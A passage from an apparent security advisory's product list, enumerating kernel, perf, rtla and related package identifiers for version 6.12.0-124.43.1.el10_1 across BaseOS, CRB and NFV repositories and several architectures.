"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
